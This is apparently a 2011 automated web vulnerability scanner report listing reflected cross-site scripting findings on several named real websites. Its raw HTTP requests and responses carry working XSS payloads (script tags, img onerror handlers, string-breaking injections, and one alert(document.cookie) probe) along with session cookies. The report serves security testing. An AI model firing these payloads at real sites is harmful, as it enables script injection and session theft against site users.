GET /identity_theft_protection_services9b33a"><script>alert(1)</script>b562ccaade5/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload b5c82'><img%20src%3da%20onerror%3dalert(1)>795db6ed304 was submitted in the REST URL parameter 1. This input was echoed as b5c82'><img src=a onerror=alert(1)>795db6ed304 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /identity_theft_protection_servicesb5c82'><img%20src%3da%20onerror%3dalert(1)>795db6ed304/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c97f9"><script>alert(1)</script>806bcf582e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /identity_theft_protection_services/index.phpc97f9"><script>alert(1)</script>806bcf582e?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the a request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f9a56"><a>1e5a74a50df was submitted in the a parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /identity_theft_protection_services/index.php?a=2f9a56"><a>1e5a74a50df&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the gclid request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 728cc"><a>578d1ace82c was submitted in the gclid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw728cc"><a>578d1ace82c HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the kw request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8db44"><script>alert(1)</script>902d9f51952 was submitted in the kw parameter. This input was echoed as 8db44\"><script>alert(1)</script>902d9f51952 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource8db44"><script>alert(1)</script>902d9f51952&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
2.79. http://www.nextadvisor.com/identity_theft_protection_services/index.php [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Firm
Host:
http://www.nextadvisor.com
Path:
/identity_theft_protection_services/index.php
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c7b99"><a>63ed369bc85 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
Request
GET /identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw&c7b99"><a>63ed369bc85=1 HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ec128"><script>alert(1)</script>8d8e788b495 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /imagesec128"><script>alert(1)</script>8d8e788b495/favicon.ico HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload f6085'><img%20src%3da%20onerror%3dalert(1)>799b035f423 was submitted in the REST URL parameter 1. This input was echoed as f6085'><img src=a onerror=alert(1)>799b035f423 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /imagesf6085'><img%20src%3da%20onerror%3dalert(1)>799b035f423/favicon.ico HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 429d6"><script>alert(1)</script>7b474b584c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /images/favicon.ico429d6"><script>alert(1)</script>7b474b584c HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Accept: */* User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28; __utmz=252293142.1303613812.1.1.utmgclid=CJa0kuyTtKgCFQTe4AodlRiOCw|utmccn=(not%20set)|utmcmd=(not%20set); __utma=252293142.2039271104.1303613812.1303613812.1303613812.1; __utmc=252293142; __utmb=252293142.1.10.1303613812
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in single quotation marks. The payload d7d1a'><img%20src%3da%20onerror%3dalert(1)>4107ebce2ae was submitted in the REST URL parameter 1. This input was echoed as d7d1a'><img src=a onerror=alert(1)>4107ebce2ae in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
Request
GET /includesd7d1a'><img%20src%3da%20onerror%3dalert(1)>4107ebce2ae/javascript.php?script=animatedcollapse.js HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Referer: http://www.nextadvisor.com/identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4efa"><script>alert(1)</script>269ce0d3fcb was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includesc4efa"><script>alert(1)</script>269ce0d3fcb/javascript.php?script=animatedcollapse.js HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Referer: http://www.nextadvisor.com/identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload cffe4"><script>alert(1)</script>606be9c4018 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /includes/javascript.phpcffe4"><script>alert(1)</script>606be9c4018?script=animatedcollapse.js HTTP/1.1 Host: www.nextadvisor.com Proxy-Connection: keep-alive Referer: http://www.nextadvisor.com/identity_theft_protection_services/index.php?a=2&kw=gid9a+identity%20theft%20resource&gclid=CJa0kuyTtKgCFQTe4AodlRiOCw User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: PHPSESSID=ca43057bfb377bbe8c129dafe1c6ec28
2.86. http://www.startribune.com/business/120319724.html [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www.startribune.com
Path:
/business/120319724.html
Issue detail
The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8fb2c"><script>alert(1)</script>340a03fd30 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /business/120319724.html?8fb2c"><script>alert(1)</script>340a03fd30=1 HTTP/1.1 Host: www.startribune.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the shareURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e8c00"><script>alert(1)</script>b9311f1e57f was submitted in the shareURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.
Request
GET /share?shareURL=http://www.startribune.com/business/120319724.htmle8c00"><script>alert(1)</script>b9311f1e57f HTTP/1.1 Host: www.startribune.com Proxy-Connection: keep-alive Referer: http://www.startribune.com/business/120319724.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BBN2=3spZ6OLqOB1SoYyqTE5ehlGQyLTBTTtiQ_5CYiNLJoE4V6pwyO8LUrQ; rsi_segs=; __gads=ID=f03cfcd82208d24a:T=1303613694:S=ALNI_MZeapzxwp9OE5uXr0-WHOgVAHuqFg
The value of the shareURL request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 1c478"><script>alert(1)</script>5dda205ec15 was submitted in the shareURL parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /share/?shareURL=http%3A%2F%2Fwww.startribune.com%2Fbusiness%2F120319724.html1c478"><script>alert(1)</script>5dda205ec15 HTTP/1.1 Host: www.startribune.com Proxy-Connection: keep-alive Referer: http://www.startribune.com/business/120319724.html User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: BBN2=3spZ6OLqOB1SoYyqTE5ehlGQyLTBTTtiQ_5CYiNLJoE4V6pwyO8LUrQ; rsi_segs=; __gads=ID=f03cfcd82208d24a:T=1303613694:S=ALNI_MZeapzxwp9OE5uXr0-WHOgVAHuqFg
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 845c2"><script>alert(1)</script>e30737451a8 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /popups845c2"><script>alert(1)</script>e30737451a8/entry.htm?detect=false HTTP/1.1 Host: www.volkswagensouthburlington.com Proxy-Connection: keep-alive Referer: http://www.volkswagensouthburlington.com/used/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ssoid=831047880a0a006e00d46b95e9acb101; JSESSIONID=3b6203h50frnu; ddcpoolid=CmsPoolG; sifrFetch=true; __utmz=1.1303574015.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); __utma=1.1334335860.1303574015.1303574015.1303574015.1; __utmc=1; __utmb=1.2.10.1303574015
Response
HTTP/1.1 404 Not Found Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16 P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Content-Type: text/html;charset=iso-8859-1 X-DDC-Arch-Trace: ,HttpResponse Content-Length: 18968 Vary: Accept-Encoding Date: Sat, 23 Apr 2011 15:54:58 GMT Connection: close
<title>Volkswagen South Burlington, Vermont | VW Dealers Burlington, VT | New & Used Car Dealers ...[SNIP]... <img src="http://hits.dealer.com/clear.gif?&4=0&5=0&10=&20=www.volkswagensouthburlington.com&21=/popups845c2"><script>alert(1)</script>e30737451a8/entry.htm&50=831047880a0a006e00d46b95e9acb101&51=&52=&53=&54=en_US&55=173.193.214.243&56=&60=&61=&64=&58=&59=&80=&81=&82=&83=&62-0=1 ...[SNIP]...
The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 8ef0f"><script>alert(1)</script>80e774f468f was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /used8ef0f"><script>alert(1)</script>80e774f468f/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm HTTP/1.1 Host: www.volkswagensouthburlington.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 404 Not Found Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16 P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Content-Type: text/html;charset=iso-8859-1 X-DDC-Arch-Trace: ,HttpResponse,CookieSet Content-Length: 20400 Vary: Accept-Encoding Date: Sat, 23 Apr 2011 15:54:26 GMT Connection: close Set-Cookie: ssoid=831124ba0a0a006e00d46b954817a3d3;path=/ Set-Cookie: JSESSIONID=29lnqliatcsk1;path=/ Set-Cookie: ddcpoolid=CmsPoolG;path=/; Expires: Thu, 01 Jan 1970 00:00:00 GMT
<title>Volkswagen South Burlington, Vermont | VW Dealers Burlington, VT | New & Used Car Dealers ...[SNIP]... <img src="http://hits.dealer.com/clear.gif?&4=0&5=0&10=&20=www.volkswagensouthburlington.com&21=/used8ef0f"><script>alert(1)</script>80e774f468f/Volkswagen/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm&50=831124ba0a0a006e00d46b954817a3d3&51=&52=&53=&54=en_US&55=173.193.214.243&56=&60=& ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 3904f"><script>alert(1)</script>55cf2eacdc2 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /used/Volkswagen3904f"><script>alert(1)</script>55cf2eacdc2/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm HTTP/1.1 Host: www.volkswagensouthburlington.com Proxy-Connection: keep-alive User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Response
HTTP/1.1 200 OK Server: Jetty/5.1.1 (Linux/2.6.18-128.el5 i386 java/1.5.0_16 P3P: "https://secure4.dealer.com/P3P/PolicyReferences.xml", CP="NOI DSP COR DEVa TAIa OUR BUS UNI" Content-Type: text/html;charset=iso-8859-1 X-DDC-Arch-Trace: ,HttpResponse,CookieSet Vary: Accept-Encoding Date: Sat, 23 Apr 2011 15:54:35 GMT Connection: close Set-Cookie: ssoid=8311469d0a0a006e00d46b956c42c509;path=/ Set-Cookie: JSESSIONID=9r64oibk9km39;path=/ Set-Cookie: ddcpoolid=CmsPoolG;path=/; Expires: Thu, 01 Jan 1970 00:00:00 GMT Content-Length: 74049
<title>Used 2010 Volkswagen Jetta Sportwagen S For Sale in South Burlington VT | VW Dealers Ver ...[SNIP]... <img src="http://hits.dealer.com/clear.gif?&4=0&5=0&10=&20=www.volkswagensouthburlington.com&21=/used/Volkswagen3904f"><script>alert(1)</script>55cf2eacdc2/2010-Volkswagen-Jetta+Sportwagen-56dc6e350a0a006500315e084179d2fb.htm&50=8311469d0a0a006e00d46b956c42c509&51=&52=&53=&54=en_US&55=173.193.214.243&56=&60=&61=&64 ...[SNIP]...
The value of the action request parameter is copied into the HTML document as plain text between tags. The payload 671b1<script>alert(1)</script>afcecb751d0 was submitted in the action parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the callback request parameter is copied into the HTML document as plain text between tags. The payload 476e6<script>alert(1)</script>f0c6e3798ca was submitted in the callback parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /whoami/?callback=jsonp1303613688804476e6<script>alert(1)</script>f0c6e3798ca&_=1303613691725&date=1303613691724&cid=1751321&ctype=18&activity=View HTTP/1.1 Host: www2.wspa.com Proxy-Connection: keep-alive Referer: http://www2.wspa.com/news/2011/apr/22/computer-hackers-strike-more-often-2011-ar-1751321/ X-Requested-With: XMLHttpRequest User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: text/javascript, application/javascript, */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
The value of the 1053353;167347;7653005851078549651;%5btimestamp%5d;M request parameter is copied into the HTML document as plain text between tags. The payload c46b7<script>alert(1)</script>0fc907875c1 was submitted in the 1053353;167347;7653005851078549651;%5btimestamp%5d;M parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /a/diff/436/1053353/show0.asp?1053353;167347;7653005851078549651;%5btimestamp%5d;Mc46b7<script>alert(1)</script>0fc907875c1 HTTP/1.1 Host: www4.smartadserver.com Proxy-Connection: keep-alive Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(1)%3C/script%3Ea66d80addda User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000; pdomid=4; pbw=%24b%3D16999%3B%24o%3D11061%3B%24c%3D42%3B; pid=7653005851078549651; TestIfCookie=ok; TestIfCookieP=ok
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: application/x-javascript Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 23 Apr 2011 17:36:40 GMT Content-Length: 545
if (screen.width && screen.height) {var jsinfocall=new Image;jsinfocall.src='http://www4.smartadserver.com/a/track/jsinfo.asp?sw='+screen.width+'&sh='+screen.height;}
The value of the 1053353;167347;7653005851078549651;[timestamp];M request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload fe8e2'-alert(1)-'4a361d38a0b was submitted in the 1053353;167347;7653005851078549651;[timestamp];M parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /a/diff/436/1053353/show0.asp?1053353;167347;7653005851078549651;[timestamp];Mfe8e2'-alert(1)-'4a361d38a0b HTTP/1.1 Host: www4.smartadserver.com Proxy-Connection: keep-alive Referer: http://en.vidivodo.com/379705/kemal-ataturk-ve-albert-einstein18ab2%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea66d80addda User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16 Accept: */* Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: ASPSESSIONIDASRQTARR=MIMJFGBBJGPNPIBEPHNJMALE; BIGipServerSMART2=1376191242.23040.0000; TestIfCookie=ok; TestIfCookieP=ok; pbwmaj5=y; pbw=%24b%3D16999%3B%24o%3D11061%3B%24sh%3D6%3B%24sw%3D6; pid=7653005851078549651; pdomid=4
Response
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Type: application/x-javascript Expires: Mon, 31 Dec 1979 23:00:00 GMT Vary: Accept-Encoding Server: Microsoft-IIS/7.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" Date: Sat, 23 Apr 2011 17:37:25 GMT Content-Length: 360
2.96. http://www4.smartadserver.com/a/diff/436/1053353/show0.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://www4.smartadserver.com
Path:
/a/diff/436/1053353/show0.asp
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 1d523'-alert(1)-'f79aa0fec9c was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
